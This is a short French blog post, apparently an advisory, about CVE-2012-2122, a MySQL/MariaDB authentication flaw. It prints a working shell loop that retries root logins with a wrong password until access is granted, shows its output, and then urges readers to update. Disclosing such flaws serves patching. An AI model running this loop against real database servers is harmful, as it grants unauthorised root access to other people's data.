MySQL – Faille de sécurité

 dans Sécurité

Une faille de sécurité d’authentification vient d’être découvert. Ceci touche MySQL ainsi que MariaDB.

Ce problème est reporté sous la référence CVE-2012-2122.

Cette faille permet à un utilisateur local sur la machine de se connecter à un serveur MySQL ou MariaDB sous root et sans le mot de passe. 

Le bon coté de la chose est que tout les systèmes ne sont pas touchés. Vous trouverez les informations nécessaires dans le CVE.

Voici sans attendre un morceau de code qui permet l’exploit de la vulnérabilité. J’ai testé cette faille fonctionnelle sous Fedora 16 :

# while true; do mysql -u root –password=djerfy; done
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)

mysql>

Si vous êtes concerné par cette faille, il ne reste plus qu’a mettre à jour votre système rapidement 🙂

Articles recommandés